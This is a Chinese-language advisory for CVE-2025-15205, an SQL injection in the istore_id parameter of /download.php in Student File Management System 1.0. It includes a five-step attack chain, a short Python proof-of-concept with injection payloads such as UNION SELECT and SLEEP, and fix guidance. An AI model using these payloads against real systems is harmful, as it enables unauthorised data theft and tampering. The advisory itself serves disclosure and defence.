CVE-2025-15205: Student File Management System 1.0 /download.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15205

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student File Management System 1.0

漏洞概述

CVE-2025-15205是code-projects开源项目Student File Management System 1.0中存在的一个SQL注入漏洞。该漏洞位于/download.php文件中的istore_id参数，攻击者可通过构造恶意SQL语句实现未授权数据库操作。受影响的系统为学生文件管理系统，用于管理学校或教育机构的学生文件资源。由于该漏洞利用复杂度低且公开可用，攻击者可远程利用获取敏感数据或破坏系统完整性，对教育机构的数据安全构成中等威胁。

技术细节

该SQL注入漏洞存在于download.php文件处理istore_id参数的过程中。攻击者可通过HTTP请求在istore_id参数中注入恶意SQL语句，如使用UNION SELECT、布尔盲注或时间盲注等技术。漏洞根源在于应用程序未对用户输入进行充分的参数化查询或输入过滤。攻击者利用此漏洞可实现：1）数据提取：通过UNION注入获取数据库中的用户信息、文件元数据等敏感数据；2）认证绕过：结合低权限账户实现更高权限操作；3）数据篡改：修改或删除数据库记录；4）潜在系统控制：在特定数据库配置下可能实现操作系统命令执行。建议开发者使用参数化查询或预编译语句处理所有用户输入，并对输入进行严格的类型检查和白名单验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为Student File Management System 1.0，确认/download.php端点存在

STEP 2

步骤2: 参数探测

通过在istore_id参数中注入测试payload（如单引号）观察应用程序响应，判断是否存在SQL注入

STEP 3

步骤3: 注入利用

利用UNION注入或盲注技术提取数据库结构信息、用户凭证、文件路径等敏感数据

STEP 4

步骤4: 权限提升

结合系统低权限账户和SQL注入获取的管理员凭据或更高权限

STEP 5

步骤5: 数据窃取或破坏

攻击者可导出敏感文件、修改数据或删除数据库记录，造成数据泄露或系统不可用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15205 SQL Injection PoC
# Target: Student File Management System 1.0
# Endpoint: /download.php?istore_id=<payload>

target_url = "http://target-server/download.php"

# Basic SQL injection payloads for testing
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT 1,2,3--",
    "1' AND SLEEP(5)--",
    "1' ORDER BY 1--",
]

def test_sqli(url, param="istore_id"):
    """Test for SQL injection vulnerability"""
    for payload in payloads:
        params = {param: payload}
        try:
            response = requests.get(url, params=params, timeout=10)
            # Check for SQL error messages or time delays
            if "SQL" in response.text or "error" in response.text.lower():
                print(f"[+] Potential SQLi found with payload: {payload}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    return False

if __name__ == "__main__":
    # Usage example
    test_sqli(target_url)

影响范围

Student File Management System 1.0

防御指南

临时缓解措施

立即在/download.php文件中对istore_id参数使用参数化查询替代字符串拼接；对所有用户输入实施白名单验证；临时措施可使用WAF规则阻止包含SQL特殊字符（如单引号、UNION、SELECT等）的请求；限制数据库账户权限避免数据泄露范围扩大。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15205
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15205
3 Details https://www.cvedetails.com/cve/CVE-2025-15205/
4 VulDB https://vuldb.com/cve/CVE-2025-15205
5 Link https://code-projects.org/
6 Link https://github.com/Bai-public/CVE/issues/4
7 Link https://vuldb.com/?ctiid.338592
8 Link https://vuldb.com/?id.338592
9 Link https://vuldb.com/?submit.724818